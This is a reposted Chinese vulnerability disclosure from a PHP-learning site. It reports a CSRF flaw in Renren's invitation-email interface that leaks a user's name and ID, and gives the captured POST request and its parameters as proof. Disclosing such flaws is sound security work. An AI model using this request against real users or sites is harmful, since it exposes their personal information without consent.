网站地图    收藏   

主页 > 后端 > 网站安全 >

人人网CSRF用户信息泄露及修复方案 - 网站安全

来源:自学PHP网    时间:2015-04-17 13:03 作者: 阅读:

[导读] 简要描述:人人网某处的CSRF漏洞可以导致用户信息泄露详细说明:人人网向邮箱发送注册邀请的接口没有CSRF防御措施,收到的邮件内有用户的姓名,注册后可以得到用户ID.漏洞证明:POS...

 

简要描述:人人网某处的CSRF漏洞可以导致用户信息泄露

详细说明:人人网向邮箱发送注册邀请的接口没有CSRF防御措施,收到的邮件内有用户的姓名,注册后可以得到用户ID.

漏洞证明:

POST http://invite.renren.com/csendMail.do?logid=

 

   Request Headers:

 

      Host[invite.renren.com]

 

      User-Agent[Mozilla/5.0 ]

 

      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]

 

      Accept-Language[zh-cn,zh;q=0.5]

 

      Accept-Encoding[gzip, deflate]

 

      Accept-Charset[UTF-8,*]

 

      Connection[keep-alive]

 

      Referer[http://invite.renren.com/cnotin.do?logid=]

 

      Cookie

 

   Post Data:

 

      mail[yourmail@mail.com|pz]

 

      importer[]

 

      uAccount[anything@163.com]

 

      classcontent[]

 

      action_type[5000]

 

      appId[0]

 

      url[]

 

      app_html[]

 

      inv_id[]

看,没token吧,referer也不管用啊.

 

 

摘自  p.z

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论